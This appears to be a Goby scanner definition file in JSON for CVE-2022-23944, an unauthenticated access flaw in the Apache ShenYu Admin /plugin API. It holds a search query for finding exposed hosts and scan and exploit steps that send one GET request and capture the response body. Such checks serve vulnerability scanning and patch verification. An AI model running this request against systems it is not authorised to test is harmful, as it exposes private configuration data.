Goby/json/Apache_ShenYu_Admin_Unauth_...

97 lines
3.6 KiB
JSON

{
"Name": "Apache ShenYu Admin Unauth Access CVE-2022-23944",
"Level": "1",
"Tags": [
"unauthaccess"
],
"GobyQuery": "company=\"Apache\" || body=\"shenyu\"",
"Description": "Apache ShenYu is an effort undergoing incubation at The Apache Software Foundation (ASF), sponsored by the Apache Incubator.",
"Product": "Apache ShenYu",
"Homepage": "https://shenyu.apache.org/",
"Author": "",
"Impact": "User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.",
"Recommendation": "http://www.openwall.com/lists/oss-security/2022/01/26/2",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-23944"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/plugin",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "query success",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/plugin",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "query success",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|(.*)"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}